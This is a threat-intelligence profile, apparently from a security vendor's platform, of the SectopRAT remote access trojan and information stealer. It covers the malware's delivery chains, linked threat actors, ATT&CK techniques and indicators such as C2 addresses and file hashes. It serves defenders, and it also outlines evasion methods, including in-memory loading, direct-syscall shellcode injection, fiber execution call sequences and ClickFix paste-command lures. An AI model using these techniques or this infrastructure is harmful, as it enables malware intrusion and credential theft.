SectopRAT
SectopRAT is a .NET-based remote access trojan and information stealer, also tracked as Arechclient2. The provided content states it has been active since at least 2019. Its observed capabilities include theft of browser credentials and cookies, browser session hijacking, collection of email client data, cryptocurrency wallet theft, harvesting of application credentials and installed software information, language discovery, storage enumeration, process injection, privilege manipulation, PowerShell execution, and DLL sideloading for persistence. Microsoft reporting in the content also notes encrypted C2 and the ability to create a hidden second desktop for stealthy operator activity.
Across the cited reporting, SectopRAT is commonly delivered as a secondary payload through multi-stage loader chains and social-engineering campaigns. Documented delivery vectors in the content include ClickFix and fake CAPTCHA lures, fake browser update pages, SEO poisoning and malvertising, trojanized software installers such as Slack and Zoom lookalikes, compromised WordPress sites, and loader ecosystems including ACRStealer, CastleLoader, ClearFake, HijackLoader/IDAT Loader, and NetSupport RAT-based intrusion chains. Several reports describe reflective or in-memory loading of the final SectopRAT payload, including .NET assembly loading, AES-decrypted Donut shellcode, fiber-based shellcode execution, AMSI bypass, and use of direct NTDLL syscalls.
The malware is associated in the content with financially motivated cybercrime activity rather than a single exclusive actor. Reported overlaps or delivery relationships include GrayCharlie/SmartApeSG, CastleLoader activity attributed with medium-high confidence to GrayBravo, and infrastructure overlap with ACRStealer, AmateraStealer, NetSupport RAT, Vidar, and ClickFix/FakeCAPTCHA ecosystems. CERT-UA reporting in the content also lists SECTOPRAT among tooling used by UAC-0050. Targeting described in the content is broad and opportunistic, though specific victim sectors mentioned in related campaigns include U.S. law firms, government agencies, critical infrastructure, IT firms, logistics companies, and Ukrainian organizations.
High-confidence indicators and infrastructure directly mentioned for SectopRAT in the content include C2 servers 94.26.106.216:9000, 89.110.107.177, 144.31.90.139, 194.150.220.218, 85.158.110.179:15847, and 45.141.87.218 on ports including 15647 and 9000. Reported C2 paths include /wbinjget, which returned "Internal error!" as a heartbeat, and /wmglb, which served an encrypted blob. Additional hashes and artifacts tied to SectopRAT delivery in the content include DataUpdateClient.exe SHA-256 f1c6397d57a8b1d0a931690e3703a13d95760a2b6a1623bdbfa71e25e886a64e, Donut shellcode SHA-256 e7796671f9817ce4a90635589dfd2e21797d689aafa5cf5efe52072a058be67f, verification.google SHA-256 03b4722296d5e7163bd58e2dddf38159e4eec34ab2a4a05225e8cd0119e297db, a second wave payload SHA-256 0a62b065688ebbb636fb8f800881da22d6cb480bb458870909a39c0228c10c90, and a later sideloaded SectopRAT sample SHA-256 59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The PowerShell dropper ( bruce.php ) unpacks through five stages -- XOR decryption, reflective .NET assembly loading, AES-256-CBC decryption, Donut shellcode injection via raw NTDLL syscalls -- before deploying the final SectopRAT info-stealer targeting browser credentials, email clients, and cryptocurrency wallets.
Operators connect via C2, run system reconnaissance, and can drop SectopRAT as a secondary payload.
Operators connect via C2, run system reconnaissance, and can drop SectopRAT as a secondary payload.
Techniques & procedures
35 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniquesMITRE ATT&CK Mapping Tactic Technique ID Notes Resource Development Acquire Infrastructure: Domains T1583.001 casyetnx[.]pw via CNOBIN, hosting via dataforest/VDSINA
MITRE ATT&CK Mapping ... Resource Development Compromise Infrastructure T1584.004 Compromised acecareer.edu WordPress for payload hosting
Initial Access
1 techniqueClearFake spreads by compromising legitimate websites and injecting hidden JavaScript code into their pages. Victims do not need to do anything suspicious to get infected. Simply visiting a tampered legitimate site can trigger the malware’s multi-stage delivery chain.
Execution
5 techniquesDespite the .php extension, this is pure PowerShell... The actual payload mechanism is straightforward... After decryption, the result is a valid PE32 .NET assembly loaded directly into memory.
Stage 3 -- Legitimate Python Binary : The ZIP extracts to a directory containing FNPLicensingService.exe -- which is actually a renamed, legitimately signed CPython 3.15 pythonw.exe... Stage 4 -- Obfuscated Python Loader : chrome_100_percent.pak ... is an ASCII text file containing obfuscated Python code.
After decryption, the loader allocates executable memory via NtAllocateVirtualMemory, writes the shellcode, and creates a new thread with NtCreateThreadEx. Both calls go directly to NTDLL, bypassing the Win32 API layer where most EDR products place their hooks.
Windows users were instructed to open the Run dialog and paste it, loading a remote DLL into memory with no file ever written to disk.
The user copies and pastes a PowerShell command into their own terminal, bypassing email security gateways, browser sandboxes, and most EDR behavioral triggers that watch for automated script execution.
Persistence
1 techniquePrivilege Escalation
3 techniquesDataUpdateClient.exe... Injects via NtAllocateVirtualMemory + NtCreateThreadEx... MITRE ATT&CK Mapping... T1055 Donut shellcode injection via NTDLL syscalls.
Rather than the standard CreateThread or NtCreateThreadEx injection techniques... the loader uses Windows Fibers: VirtualAlloc(RWX) ... ConvertThreadToFiber(0) ... CreateFiber(0, addr, 0) ... SwitchToFiber(fiber)
Stealth
10 techniquesEach stage exists to defeat a different class of defense... the XOR and AES layers defeat static analysis... MITRE ATT&CK Mapping... T1027 Three-layer encryption (XOR, AES-256-CBC, Chaskey).
MITRE ATT&CK Mapping ... Defense Evasion Software Packing T1027.002 Reversed Base64 + Zlib compression
MITRE ATT&CK Mapping ... Defense Evasion Masquerading T1036.005 FNPLicensingService.exe (renamed pythonw.exe)
DataUpdateClient.exe... Injects via NtAllocateVirtualMemory + NtCreateThreadEx... MITRE ATT&CK Mapping... T1055 Donut shellcode injection via NTDLL syscalls.
Rather than the standard CreateThread or NtCreateThreadEx injection techniques... the loader uses Windows Fibers: VirtualAlloc(RWX) ... ConvertThreadToFiber(0) ... CreateFiber(0, addr, 0) ... SwitchToFiber(fiber)
The chrome_100_percent.pak file decodes through three distinct layers... reverse string, base64 decode, zlib decompress ... rolling XOR decrypts embedded SectopRAT PE
Architecture gate: Forces relaunch in 32-bit PowerShell via $env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe... MITRE ATT&CK Mapping... T1218 32-bit PowerShell relaunch via SysWOW64.
Four contracts served distinct roles: Smart Contract A delivered the anti-analysis dispatcher...
Victims on Windows and macOS were routed to separate payloads tailored to their operating system, with routing handled by real-time OS detection in the browser.
After decryption, the result is a valid PE32 .NET assembly loaded directly into memory via [System.Reflection.Assembly]::Load() -- entirely fileless.
Credential Access
3 techniquesVictims saw a convincing fake Google reCAPTCHA overlay complete with an “I’m not a robot” checkbox. Clicking it triggered the ClickFix social engineering panel...
ACRStealer, a C++ infostealer that harvests passwords, credit card numbers, cookies, and cryptocurrency wallet data.
SectopRAT... Browser credential theft -- Chrome, Firefox, Edge profile data, saved passwords, cookies.
Discovery
4 techniquesFour contracts served distinct roles: Smart Contract A delivered the anti-analysis dispatcher...
Victims on Windows and macOS were routed to separate payloads tailored to their operating system, with routing handled by real-time OS detection in the browser.
SectopRAT... Software inventory -- enumeration of all installed applications.
SectopRAT... System reconnaissance -- language discovery, physical storage enumeration.
Collection
5 techniquesStage 9: Data Theft Browser credential/cookie theft Cryptocurrency wallet theft Application credential harvesting
Victims saw a convincing fake Google reCAPTCHA overlay complete with an “I’m not a robot” checkbox. Clicking it triggered the ClickFix social engineering panel...
SectopRAT... Email client harvesting -- Outlook and Thunderbird data extraction.
Clicking it triggered the ClickFix social engineering panel, which simultaneously injected a malicious command directly into the victim’s clipboard.
SectopRAT, a .NET-based Remote Access Trojan capable of hijacking browser sessions
Command and Control
5 techniquesThreat actors used a technique called EtherHiding to store payload routing instructions inside blockchain smart contracts, bypassing all URL-based blocking methods entirely.
Stage 8: C2 Communication HTTP to 94[.]26[.]106[.]216:9000 /wbinjget -- heartbeat ... /wmglb -- payload/config download
MITRE ATT&CK Mapping... T1090.002 Cloudflare CDN as C2 proxy layer.
When a victim visits a compromised site, injected code quietly queries the blockchain and retrieves the full payload into the browser with no external URL involved.
MITRE ATT&CK Mapping ... Command and Control Non-Standard Port T1571 Port 9000
Exfiltration
1 techniqueMITRE ATT&CK Mapping Tactic Technique ID Notes Exfiltration Over C2 Channel T1041 HTTP exfiltration
Other
1 techniqueIOCs tracked for this family
102 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
33 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A .NET-based remote access trojan used in the ClearFake campaign to hijack browser sessions and support post-compromise access on victim systems.
A remote access trojan with stealer capabilities delivered in a similar fake Slack download campaign.
A RAT delivered as a secondary payload by CastleLoader.
Remote access trojan family with infrastructure present on the same malicious network.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.